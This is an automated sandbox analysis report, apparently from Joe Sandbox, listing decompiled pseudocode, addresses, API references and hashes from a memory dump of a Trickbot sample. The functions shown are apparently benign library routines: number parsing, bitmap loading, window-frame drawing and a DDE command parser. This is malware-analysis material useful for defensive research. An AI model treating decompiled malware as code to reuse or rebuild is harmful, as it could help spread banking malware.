                          								__eflags = __eax;
                          								if(__eax != 0) {
                          									goto L110;
                          								}
                          								goto L71;
                          							}
                          							__eflags = __bl - 0x39;
                          							if(__bl <= 0x39) {
                          								goto L80;
                          							}
                          							goto L68;
                          						case 7:
                          							__eflags = __bl - 0x31;
                          							if(__bl < 0x31) {
                          								L83:
                          								__eflags = __bl - 0x30;
                          								if(__bl != 0x30) {
                          									L94:
                          									__edi = _a12;
                          									goto L111;
                          								}
                          								L71:
                          								_push(8);
                          								goto L90;
                          							}
                          							__eflags = __bl - 0x39;
                          							if(__bl > 0x39) {
                          								goto L83;
                          							}
                          							goto L80;
                          						case 8:
                          							_v36 = __edx;
                          							while(1) {
                          								__eflags = __bl - 0x30;
                          								if(__bl != 0x30) {
                          									break;
                          								}
                          								__bl =  *__edi;
                          								__edi = __edi + 1;
                          							}
                          							__eflags = __bl - 0x31;
                          							if(__bl < 0x31) {
                          								goto L109;
                          							}
                          							__eflags = __bl - 0x39;
                          							if(__bl > 0x39) {
                          								goto L109;
                          							}
                          							L80:
                          							_push(9);
                          							L81:
                          							_pop(_t121);
                          							L82:
                          							_t148 = _t148 - 1;
                          							goto L7;
                          						case 9:
                          							_v36 = 1;
                          							__esi = 0;
                          							__eflags = 0;
                          							while(1) {
                          								__eflags =  *0x44864c - 1;
                          								if( *0x44864c <= 1) {
                          									__ecx =  *0x448440; // 0x44844a
                          									__eax = __bl & 0x000000ff;
                          									__eax = __bl & 4;
                          									__eflags = __eax;
                          								} else {
                          									__eax = __bl & 0x000000ff;
                          									__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, 4);
                          									_pop(__ecx);
                          									_pop(__ecx);
                          								}
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									break;
                          								}
                          								__ecx = __bl;
                          								_t66 = (__esi + __esi * 4) * 2; // -44
                          								__esi = __ecx + _t66 - 0x30;
                          								__eflags = __esi - 0x1450;
                          								if(__esi > 0x1450) {
                          									__esi = 0x1451;
                          									break;
                          								}
                          								__bl =  *__edi;
                          								__edi = __edi + 1;
                          							}
                          							_v32 = __esi;
                          							while(1) {
                          								__eflags =  *0x44864c - 1;
                          								if( *0x44864c <= 1) {
                          									__ecx =  *0x448440; // 0x44844a
                          									__eax = __bl & 0x000000ff;
                          									__eax = __bl & 4;
                          									__eflags = __eax;
                          								} else {
                          									__eax = __bl & 0x000000ff;
                          									__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, 4);
                          									_pop(__ecx);
                          									_pop(__ecx);
                          								}
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									break;
                          								}
                          								__bl =  *__edi;
                          								__edi = __edi + 1;
                          							}
                          							L109:
                          							_t148 = _t148 - 1;
                          							goto L111;
                          						case 0xa:
                          							goto L92;
                          						case 0xb:
                          							__eflags = _a28;
                          							if(_a28 == 0) {
                          								_push(0xa);
                          								__edi = __edi - 1;
                          								__eflags = __edi;
                          								_pop(__eax);
                          								goto L92;
                          							}
                          							__eax = __bl;
                          							_t55 = __edi - 1; // 0x1
                          							__ecx = _t55;
                          							__eax = __bl - 0x2b;
                          							__eflags = __eax;
                          							_a12 = __ecx;
                          							if(__eax == 0) {
                          								L89:
                          								_push(7);
                          								L90:
                          								_pop(_t121);
                          								goto L7;
                          							}
                          							__eax = __eax - 1;
                          							__eax = __eax - 1;
                          							__eflags = __eax;
                          							if(__eax != 0) {
                          								L110:
                          								__edi = __ecx;
                          								L111:
                          								__eflags = _v20;
                          								 *_a8 = _t148;
                          								if(_v20 == 0) {
                          									_t147 = 0;
                          									_t123 = 0;
                          									_t150 = 0;
                          									_t142 = 0;
                          									_v24 = 4;
                          									L138:
                          									_t144 = _a4;
                          									_t124 = _t123 | _v44;
                          									__eflags = _t124;
                          									_t144[1] = _t150;
                          									_t144[0] = _t142;
                          									_t144[2] = _t124;
                          									 *_t144 = _t147;
                          									return _v24;
                          								}
                          								_push(0x18);
                          								_pop(_t126);
                          								__eflags = _v8 - _t126;
                          								if(_v8 <= _t126) {
                          									_t127 = _v16;
                          								} else {
                          									__eflags = _v73 - 5;
                          									if(_v73 >= 5) {
                          										_t75 =  &_v73;
                          										 *_t75 = _v73 + 1;
                          										__eflags =  *_t75;
                          									}
                          									_v8 = _t126;
                          									_t127 = _v16 - 1;
                          									_v12 = _v12 + 1;
                          								}
                          								__eflags = _v8;
                          								if(_v8 <= 0) {
                          									_t147 = 0;
                          									_t123 = 0;
                          									_t150 = 0;
                          									_t142 = 0;
                          									goto L129;
                          								} else {
                          									while(1) {
                          										_t127 = _t127 - 1;
                          										__eflags =  *_t127;
                          										if( *_t127 != 0) {
                          											break;
                          										}
                          										_v8 = _v8 - 1;
                          										_v12 = _v12 + 1;
                          									}
                          									E0040C37B(_t148,  &_v96, _v8,  &_v68);
                          									_t131 = _v32;
                          									__eflags = _v28;
                          									if(_v28 < 0) {
                          										_t131 =  ~_t131;
                          									}
                          									_t132 = _t131 + _v12;
                          									__eflags = _v36;
                          									if(_v36 == 0) {
                          										_t132 = _t132 + _a20;
                          										__eflags = _t132;
                          									}
                          									__eflags = _v40;
                          									if(_v40 == 0) {
                          										_t132 = _t132 - _a24;
                          										__eflags = _t132;
                          									}
                          									__eflags = _t132 - 0x1450;
                          									if(_t132 <= 0x1450) {
                          										__eflags = _t132 - 0xffffebb0;
                          										if(_t132 >= 0xffffebb0) {
                          											E0040D2A1( &_v68, _t132, _a16);
                          											_t147 = _v68;
                          											_t142 = _v66;
                          											_t150 = _v62;
                          											_t123 = _v58;
                          											goto L129;
                          										}
                          										_v52 = 1;
                          										goto L128;
                          									} else {
                          										_v48 = 1;
                          										L128:
                          										_t142 = _a12;
                          										_t150 = _a12;
                          										_t123 = _a12;
                          										_t147 = _a12;
                          										L129:
                          										__eflags = _v48;
                          										if(_v48 == 0) {
                          											__eflags = _v52;
                          											if(_v52 != 0) {
                          												_t147 = 0;
                          												_t123 = 0;
                          												_t150 = 0;
                          												_t142 = 0;
                          												__eflags = 0;
                          												_v24 = 1;
                          											}
                          										} else {
                          											_t142 = 0;
                          											_t123 = 0x7fff;
                          											_t150 = 0x80000000;
                          											_t147 = 0;
                          											_v24 = 2;
                          										}
                          										goto L138;
                          									}
                          								}
                          							}
                          							L88:
                          							_v28 = _v28 | 0xffffffff;
                          							_push(7);
                          							_pop(__eax);
                          							goto L7;
                          					}
                          				}
                          				L92:
                          				if(_t121 == 0xa) {
                          					goto L111;
                          				}
                          				goto L7;
                          			}
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040c6e8
                          0x0040c6ec
                          0x0040c718
                          0x0040c71a
                          0x0040c71a
                          0x0040c71b
                          0x00000000
                          0x0040c71b
                          0x0040c6ee
                          0x0040c6f1
                          0x0040c6f1
                          0x0040c6f4
                          0x0040c6f4
                          0x0040c6f7
                          0x0040c6fa
                          0x0040c710
                          0x0040c710
                          0x0040c712
                          0x0040c712
                          0x00000000
                          0x0040c712
                          0x0040c6fc
                          0x0040c6fd
                          0x0040c6fd
                          0x0040c6fe
                          0x0040c7b8
                          0x0040c7b8
                          0x0040c7ba
                          0x0040c7bd
                          0x0040c7c1
                          0x0040c7c3
                          0x0040c8a2
                          0x0040c8a4
                          0x0040c8a6
                          0x0040c8a8
                          0x0040c8aa
                          0x0040c8c8
                          0x0040c8c8
                          0x0040c8cb
                          0x0040c8cb
                          0x0040c8cf
                          0x0040c8d2
                          0x0040c8d5
                          0x0040c8dd
                          0x0040c8e2
                          0x0040c8e2
                          0x0040c7c9
                          0x0040c7cb
                          0x0040c7cc
                          0x0040c7cf
                          0x0040c7e6
                          0x0040c7d1
                          0x0040c7d1
                          0x0040c7d5
                          0x0040c7d7
                          0x0040c7d7
                          0x0040c7d7
                          0x0040c7d7
                          0x0040c7da
                          0x0040c7e0
                          0x0040c7e1
                          0x0040c7e1
                          0x0040c7e9
                          0x0040c7ed
                          0x0040c898
                          0x0040c89a
                          0x0040c89c
                          0x0040c89e
                          0x00000000
                          0x0040c7f3
                          0x0040c7f3
                          0x0040c7f3
                          0x0040c7f4
                          0x0040c7f7
                          0x00000000
                          0x00000000
                          0x0040c7f9
                          0x0040c7fc
                          0x0040c7fc
                          0x0040c80c
                          0x0040c811
                          0x0040c819
                          0x0040c81c
                          0x0040c81e
                          0x0040c81e
                          0x0040c820
                          0x0040c823
                          0x0040c826
                          0x0040c828
                          0x0040c828
                          0x0040c828
                          0x0040c82b
                          0x0040c82e
                          0x0040c830
                          0x0040c830
                          0x0040c830
                          0x0040c833
                          0x0040c838
                          0x0040c86a
                          0x0040c86f
                          0x0040c882
                          0x0040c887
                          0x0040c88a
                          0x0040c88d
                          0x0040c890
                          0x00000000
                          0x0040c893
                          0x0040c871
                          0x00000000
                          0x0040c83a
                          0x0040c83a
                          0x0040c841
                          0x0040c841
                          0x0040c844
                          0x0040c847
                          0x0040c84a
                          0x0040c84d
                          0x0040c84d
                          0x0040c851
                          0x0040c8b3
                          0x0040c8b7
                          0x0040c8b9
                          0x0040c8bb
                          0x0040c8bd
                          0x0040c8bf
                          0x0040c8bf
                          0x0040c8c1
                          0x0040c8c1
                          0x0040c853
                          0x0040c853
                          0x0040c855
                          0x0040c85a
                          0x0040c85f
                          0x0040c861
                          0x0040c861
                          0x00000000
                          0x0040c851
                          0x0040c838
                          0x0040c7ed
                          0x0040c704
                          0x0040c704
                          0x0040c708
                          0x0040c70a
                          0x00000000
                          0x00000000
                          0x0040c4a5
                          0x0040c71c
                          0x0040c71f
                          0x00000000
                          0x00000000
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID:
                          • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
                          • API String ID: 0-1157002505
                          • Opcode ID: 635dc67f470208677568e49c00176d163a581d78d328174a98605d98462ba57d
                          • Instruction ID: ecd19a9f7ff05c4cbeb3f3fee7b22305a3c388e17ab9b6ff34084ad045ef0eeb
                          • Opcode Fuzzy Hash: 635dc67f470208677568e49c00176d163a581d78d328174a98605d98462ba57d
                          • Instruction Fuzzy Hash: 22E1DD7194021ADEEB248F68C8957BE7BB1BB04304F28423BD401B72D2D77D99829B1D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E004233B8(int _a4, int _a8, struct HDC__* _a12) {
                          				int* _v8;
                          				intOrPtr* _v12;
                          				void* _v16;
                          				void* _t37;
                          				signed int _t42;
                          				struct HDC__* _t49;
                          				struct HBITMAP__* _t50;
                          				intOrPtr* _t60;
                          				int* _t61;
                          				int _t66;
                          				signed int _t69;
                          				intOrPtr* _t74;
                          				signed int _t77;
                          				signed int* _t82;
                          				int _t83;
                          				struct HDC__* _t84;
                          				intOrPtr* _t85;
                          
                          				_t37 = LoadResource(_a4, _a8);
                          				if(_t37 == 0) {
                          					L3:
                          					return 0;
                          				}
                          				_t60 = LockResource(_t37);
                          				_v12 = _t60;
                          				if(_t60 == 0) {
                          					goto L3;
                          				}
                          				_t80 =  *_t60 + 0x40;
                          				_t85 = E0040511B( *_t60 + 0x40);
                          				if(_t85 != 0) {
                          					E00405400(_t85, _t60, _t80);
                          					_t82 = _t85 +  *_t85;
                          					_a8 = 0x10;
                          					do {
                          						_t42 =  *_t82;
                          						_t69 = 0;
                          						_t74 = 0x43c5b8;
                          						while(_t42 !=  *_t74) {
                          							_t74 = _t74 + 8;
                          							_t69 = _t69 + 1;
                          							if(_t74 < "DllGetVersion") {
                          								continue;
                          							}
                          							goto L13;
                          						}
                          						if(_a12 == 0) {
                          							_t61 = 0x43c5bc + _t69 * 8;
                          							_v8 = _t61;
                          							GetSysColor( *(0x43c5bc + _t69 * 8));
                          							GetSysColor( *_t61);
                          							 *_t82 = 0 << 0x00000008 | GetSysColor( *_v8) >> 0x00000010 & 0x000000ff;
                          						} else {
                          							if( *(0x43c5bc + _t69 * 8) != 0x12) {
                          								 *_t82 = 0xffffff;
                          							}
                          						}
                          						L13:
                          						_t82 =  &(_t82[1]);
                          						_t14 =  &_a8;
                          						 *_t14 = _a8 - 1;
                          					} while ( *_t14 != 0);
                          					_t83 =  *(_t85 + 4);
                          					_t66 =  *(_t85 + 8);
                          					_a4 = _t83;
                          					_a8 = _t66;
                          					_t49 = GetDC(0);
                          					_a12 = _t49;
                          					_t50 = CreateCompatibleBitmap(_t49, _t83, _t66);
                          					_v8 = _t50;
                          					if(_t50 != 0) {
                          						_t84 = CreateCompatibleDC(_a12);
                          						_v16 = SelectObject(_t84, _v8);
                          						_push(0xcc0020);
                          						_push(0);
                          						_push(_t85);
                          						_t77 = 1;
                          						StretchDIBits(_t84, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (_t77 <<  *(_t85 + 0xe)) * 4, ??, ??, ??);
                          						SelectObject(_t84, _v16);
                          						DeleteDC(_t84);
                          					}
                          					ReleaseDC(0, _a12);
                          					E004053B8(_t85);
                          					return _v8;
                          				}
                          				goto L3;
                          			}

                          0x004233c7
                          0x004233cf
                          0x004233f3
                          0x00000000
                          0x004233f3
                          0x004233d8
                          0x004233dc
                          0x004233df
                          0x00000000
                          0x00000000
                          0x004233e3
                          0x004233ec
                          0x004233f1
                          0x004233fd
                          0x00423407
                          0x00423409
                          0x00423410
                          0x00423410
                          0x00423412
                          0x00423414
                          0x00423419
                          0x0042341d
                          0x00423420
                          0x00423427
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00423429
                          0x0042342f
                          0x0042344a
                          0x00423451
                          0x00423454
                          0x00423462
                          0x00423480
                          0x00423431
                          0x00423439
                          0x0042343b
                          0x0042343b
                          0x00423439
                          0x00423482
                          0x00423482
                          0x00423485
                          0x00423485
                          0x00423485
                          0x0042348a
                          0x0042348d
                          0x00423492
                          0x00423495
                          0x00423498
                          0x004234a1
                          0x004234a4
                          0x004234ac
                          0x004234af
                          0x004234c3
                          0x004234cb
                          0x004234d0
                          0x004234d5
                          0x004234d6
                          0x004234d9
                          0x004234f5
                          0x004234ff
                          0x00423502
                          0x00423502
                          0x0042350d
                          0x00423514
                          0x00000000
                          0x0042351c
                          0x00000000

                          APIs
                          • LoadResource.KERNEL32(?,?), ref: 004233C7
                          • LockResource.KERNEL32(00000000), ref: 004233D2
                          • GetSysColor.USER32 ref: 00423454
                          • GetSysColor.USER32(00000000), ref: 00423462
                          • GetSysColor.USER32(?), ref: 00423472
                          • GetDC.USER32(00000000), ref: 00423498
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004234A4
                          • CreateCompatibleDC.GDI32(00000000), ref: 004234B4
                          • SelectObject.GDI32(00000000,?), ref: 004234C6
                          • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 004234F5
                          • SelectObject.GDI32(00000000,00000000), ref: 004234FF
                          • DeleteDC.GDI32(00000000), ref: 00423502
                          • ReleaseDC.USER32(00000000,00000000), ref: 0042350D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
                          • String ID: DllGetVersion
                          • API String ID: 257281507-2861820592
                          • Opcode ID: 902ce2d935a2a3b9f110c8f414446d6c8568507f20db40b5eda5495fdca7215f
                          • Instruction ID: 2ec7071b640d1559f0c94d3d0ada326af706184f52b3cd5639a974a90c0fd889
                          • Opcode Fuzzy Hash: 902ce2d935a2a3b9f110c8f414446d6c8568507f20db40b5eda5495fdca7215f
                          • Instruction Fuzzy Hash: 3C41F472600215FFDB119F64EC84AAF3BB9FF48315B50806AF90597260C778AE11DF68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E00411340(struct HWND__* _a4, int _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
                          				signed int _v12;
                          				intOrPtr _v20;
                          				char _v24;
                          				signed int _v28;
                          				intOrPtr _v32;
                          				struct tagRECT _v48;
                          				intOrPtr _v52;
                          				void* _v56;
                          				void* _v60;
                          				_Unknown_base(*)()* _t71;
                          				long _t73;
                          				signed int _t74;
                          				signed int _t77;
                          				void* _t80;
                          				void* _t90;
                          				intOrPtr* _t91;
                          				signed int _t112;
                          				intOrPtr _t118;
                          				signed int _t119;
                          				intOrPtr _t123;
                          				void* _t124;
                          				intOrPtr _t125;
                          				void* _t134;
                          				intOrPtr* _t135;
                          				intOrPtr* _t141;
                          				intOrPtr* _t148;
                          				struct HDC__* _t151;
                          				struct HWND__* _t152;
                          				void** _t161;
                          
                          				_t156 =  &_v60;
                          				if(_a20 == 0) {
                          					_t152 = _a4;
                          					_t71 = E00410610(__eflags, _t152, 6);
                          					_t156 =  &(( &_v60)[2]);
                          				} else {
                          					_t71 = 0;
                          					_t152 = _a4;
                          				}
                          				_push(_a16);
                          				if(_t71 == 0) {
                          					_t73 = DefWindowProcA(_t152, _a8, _a12, ??);
                          				} else {
                          					_t73 = CallWindowProcA(_t71, _t152, _a8, _a12);
                          				}
                          				_v60 = _t73;
                          				if( *0x44d340 != 0) {
                          					_t74 = IsIconic(_t152);
                          					__eflags = _t74;
                          					if(_t74 == 0) {
                          						_v56 = 1;
                          						SendMessageA(_t152, 0x11ef, 0,  &_v56);
                          						_t77 = GetWindowLongA(_t152, 0xfffffff0);
                          						__eflags = _v56;
                          						if(_v56 != 0) {
                          							__eflags = (_t77 & 0x10400080) - 0x10400080;
                          							if((_t77 & 0x10400080) == 0x10400080) {
                          								_t123 =  *0x44de38; // 0x0
                          								_t80 = (_t77 & 0x00c00000) - 0xc00000;
                          								__eflags = _t80 - 1;
                          								asm("sbb ebp, ebp");
                          								__eflags = GetWindowLongA - 1;
                          								asm("sbb eax, eax");
                          								_t124 = _t123 - _t80 + 1;
                          								_t151 = GetWindowDC(_t152);
                          								GetWindowRect(_t152,  &_v48);
                          								_v48.right.left = _v48.right.left - _v48.left;
                          								_push(0xf);
                          								_push(7);
                          								_v48.bottom = _v48.bottom - _v48.top;
                          								_v48.top = 0;
                          								_v48.left = 0;
                          								E00410920(_t151,  &_v48, 2);
                          								InflateRect( &_v48, 0xffffffff, 0xffffffff);
                          								_push(0xf);
                          								_push(2);
                          								E00410920(_t151,  &_v48, 0);
                          								InflateRect( &_v48, 0xffffffff, 0xffffffff);
                          								_t134 =  *0x44d388; // 0x0
                          								_t90 = SelectObject(_t151, _t134);
                          								_t135 =  &(_v48.right);
                          								_v60 = _t90;
                          								_t91 =  &_v56;
                          								 *_t135 =  *_t91;
                          								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t91 + 4));
                          								 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t91 + 8));
                          								 *((intOrPtr*)(_t135 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                          								_v32 = _v56 +  *0x44de34;
                          								E004108F0(_t151, _t135);
                          								OffsetRect( &(_v48.right), _v48.left - _v56 -  *0x44de34, 0);
                          								E004108F0(_t151,  &(_v48.right));
                          								_v48.right.left = _v56 +  *0x44de34;
                          								_v32 = _v48.left -  *0x44de34;
                          								_v28 = _v48.bottom + _t124;
                          								E004108F0(_t151,  &(_v48.right));
                          								_t161 =  &(_t156[0x10]);
                          								__eflags =  ~GetWindowLongA;
                          								if( ~GetWindowLongA != 0) {
                          									_t148 =  &(_v48.right);
                          									_t141 =  &_v24;
                          									_t125 = _t124 + _v48.bottom;
                          									 *_t141 =  *_t148;
                          									 *((intOrPtr*)(_t141 + 4)) = _v48.bottom;
                          									 *((intOrPtr*)(_t141 + 8)) =  *((intOrPtr*)(_t148 + 8));
                          									_t118 =  *0x44de3c; // 0x0
                          									_push(0xf);
                          									_t119 = _t118 + _t125;
                          									__eflags = _t119;
                          									_push(0);
                          									 *((intOrPtr*)(_t141 + 0xc)) =  *((intOrPtr*)(_t148 + 0xc));
                          									_v20 = _t125;
                          									_v12 = _t119;
                          									E00410920(_t151,  &_v24, 2);
                          									_t161 =  &(_t161[5]);
                          								}
                          								_v48.bottom = _v48.bottom + _v48.top - _v52 -  *0x44de34;
                          								_t112 = _v48.bottom +  *0x44de38;
                          								__eflags = _t112;
                          								_v28 = _t112;
                          								E004108F0(_t151,  &(_v48.right));
                          								SelectObject(_t151, _v60);
                          								ReleaseDC(_t152, _t151);
                          							}
                          						}
                          						return _v60;
                          					} else {
                          						return _v60;
                          					}
                          				} else {
                          					return _v60;
                          				}
                          			}

                          0x00411340
                          0x0041134c
                          0x00411356
                          0x0041135d
                          0x00411362
                          0x0041134e
                          0x0041134e
                          0x00411350
                          0x00411350
                          0x0041136b
                          0x0041136c
                          0x0041138d
                          0x0041136e
                          0x0041137a
                          0x0041137a
                          0x0041139a
                          0x0041139e
                          0x004113af
                          0x004113b5
                          0x004113b7
                          0x004113c7
                          0x004113dc
                          0x004113eb
                          0x004113ed
                          0x004113f2
                          0x00411400
                          0x00411406
                          0x00411411
                          0x00411417
                          0x0041141c
                          0x00411420
                          0x00411424
                          0x00411427
                          0x0041142a
                          0x00411432
                          0x0041143a
                          0x00411448
                          0x0041144c
                          0x00411452
                          0x00411454
                          0x0041145a
                          0x00411462
                          0x0041146c
                          0x0041147d
                          0x00411487
                          0x00411489
                          0x0041148f
                          0x004114a0
                          0x004114a6
                          0x004114ae
                          0x004114b4
                          0x004114b8
                          0x004114bc
                          0x004114c2
                          0x004114c7
                          0x004114d2
                          0x004114d5
                          0x004114e2
                          0x004114e6
                          0x00411504
                          0x00411510
                          0x00411522
                          0x00411534
                          0x00411540
                          0x00411544
                          0x00411549
                          0x0041154c
                          0x0041154e
                          0x00411554
                          0x00411558
                          0x0041155e
                          0x00411562
                          0x00411567
                          0x0041156d
                          0x00411570
                          0x00411575
                          0x00411577
                          0x00411577
                          0x00411579
                          0x0041157d
                          0x00411584
                          0x00411588
                          0x0041158e
                          0x00411593
                          0x00411593
                          0x004115aa
                          0x004115b2
                          0x004115b2
                          0x004115b8
                          0x004115bc
                          0x004115ca
                          0x004115d2
                          0x004115d2
                          0x00411406
                          0x004115e3
                          0x004113b9
                          0x004113c4
                          0x004113c4
                          0x004113a0
                          0x004113ab
                          0x004113ab

                          APIs
                          • CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 0041137A
                          • DefWindowProcA.USER32(00000000,?,?,?), ref: 0041138D
                          • IsIconic.USER32(00000000), ref: 004113AF
                          • SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 004113DC
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 004113EB
                          • GetWindowDC.USER32(00000000), ref: 0041142C
                          • GetWindowRect.USER32(00000000,?), ref: 0041143A
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0041147D
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004114A0
                          • SelectObject.GDI32(00000000,00000000), ref: 004114AE
                          • OffsetRect.USER32(?,?,00000000), ref: 00411504
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
                          • String ID:
                          • API String ID: 2215177122-0
                          • Opcode ID: 93536037d1395f4a783766876f9f4efa81ae9954d3b0669e01a76332c1226e0a
                          • Instruction ID: dc7fba4716d261272d590228d8666108f7e23948903850164cd81d0d98365c81
                          • Opcode Fuzzy Hash: 93536037d1395f4a783766876f9f4efa81ae9954d3b0669e01a76332c1226e0a
                          • Instruction Fuzzy Hash: 0681AD71608300AFD300CF68DC85E6BB7E4FB89318F144A2DF99987291D7B5E946CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E0042AFA7(intOrPtr __ecx, void* __eflags) {
                          				signed int _t209;
                          				signed int _t214;
                          				signed int _t219;
                          				signed int _t226;
                          				void* _t228;
                          				void* _t233;
                          				void* _t240;
                          				intOrPtr _t244;
                          				void* _t248;
                          				void* _t249;
                          				void* _t260;
                          				signed int _t261;
                          				void* _t262;
                          				signed int _t273;
                          				void* _t279;
                          				void* _t284;
                          				void* _t291;
                          				signed int _t297;
                          				void* _t303;
                          				void* _t308;
                          				void* _t315;
                          				signed int _t321;
                          				void* _t327;
                          				void* _t332;
                          				signed int _t337;
                          				void* _t339;
                          				signed int _t346;
                          				signed int _t349;
                          				void* _t351;
                          				signed int _t354;
                          				void* _t359;
                          				void* _t368;
                          				void* _t374;
                          				signed int _t387;
                          				intOrPtr* _t388;
                          				signed int _t389;
                          				signed int _t390;
                          				signed int _t391;
                          				signed int _t392;
                          				signed int _t393;
                          				signed int _t394;
                          				void* _t415;
                          				signed int _t482;
                          				signed int _t486;
                          				void* _t488;
                          				void* _t491;
                          				intOrPtr _t492;
                          				void* _t494;
                          
                          				E00405340(E00438A0C, _t494);
                          				 *((intOrPtr*)(_t494 - 0x14)) = __ecx;
                          				E00417F36(_t494 + 8, _t494,  *((intOrPtr*)(_t494 + 8)));
                          				_t486 = 0;
                          				 *(_t494 - 4) = 0;
                          				E00431711(_t494 - 0x40);
                          				_t482 = 4;
                          				_push(7);
                          				_push(_t494 - 0x18);
                          				 *(_t494 - 4) = 1;
                          				 *(_t494 - 0x30) = _t482;
                          				_t209 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), "[open(\"");
                          				asm("sbb bl, bl");
                          				E00417EC8(_t494 - 0x18);
                          				if( ~_t209 + 1 == 0) {
                          					_push(8);
                          					_push(_t494 - 0x18);
                          					_t214 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), "[print(\"");
                          					asm("sbb bl, bl");
                          					E00417EC8(_t494 - 0x18);
                          					__eflags =  ~_t214 + 1;
                          					if( ~_t214 + 1 == 0) {
                          						_push(0xa);
                          						_push(_t494 - 0x18);
                          						_t219 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), "[printto(\"");
                          						asm("sbb bl, bl");
                          						E00417EC8(_t494 - 0x18);
                          						__eflags =  ~_t219 + 1;
                          						if(__eflags == 0) {
                          							L34:
                          							 *(_t494 - 4) =  *(_t494 - 4) & 0x00000000;
                          							E0043176C(_t494 - 0x40, _t501);
                          							 *(_t494 - 4) =  *(_t494 - 4) | 0xffffffff;
                          							E00417EC8(_t494 + 8);
                          							 *[fs:0x0] =  *((intOrPtr*)(_t494 - 0xc));
                          							return _t486;
                          						}
                          						 *(_t494 - 0x30) = 3;
                          						_t226 =  *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffff6;
                          						__eflags = _t226;
                          						_push(_t226);
                          						_push(_t494 - 0x18);
                          						_t228 = E004151D0(_t494 + 8);
                          						 *(_t494 - 4) = 4;
                          						E00417FB5(_t494 + 8, _t494, _t228);
                          						 *(_t494 - 4) = 1;
                          						_t415 = _t494 - 0x18;
                          						L6:
                          						E00417EC8(_t415);
                          						_t488 = E0041828E(0x22);
                          						_t501 = _t488 - 0xffffffff;
                          						if(_t488 != 0xffffffff) {
                          							_push(_t488);
                          							_push(_t494 - 0x18);
                          							_t233 = E0041524C(_t494 + 8);
                          							 *(_t494 - 4) = 5;
                          							E00417FB5(_t494 - 0x2c, _t494, _t233);
                          							 *(_t494 - 4) = 1;
                          							E00417EC8(_t494 - 0x18);
                          							_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) - _t488);
                          							_push(_t494 - 0x18);
                          							_t240 = E004151D0(_t494 + 8);
                          							 *(_t494 - 4) = 6;
                          							E00417FB5(_t494 + 8, _t494, _t240);
                          							 *(_t494 - 4) = 1;
                          							E00417EC8(_t494 - 0x18);
                          							 *(_t494 - 0x18) =  *(_t494 - 0x18) & 0x00000000;
                          							_t387 = 1;
                          							 *(_t494 - 0x10) = _t387;
                          							_t244 =  *((intOrPtr*)(E00432562() + 4));
                          							__eflags =  *(_t244 + 0xac);
                          							if( *(_t244 + 0xac) == 0) {
                          								 *(_t494 - 0x18) =  *( *((intOrPtr*)(E00432562() + 4)) + 0xac);
                          							} else {
                          								_t359 = E00432562();
                          								 *( *((intOrPtr*)(E00432562() + 4)) + 0x74) =  *( *((intOrPtr*)(_t359 + 4)) + 0xac);
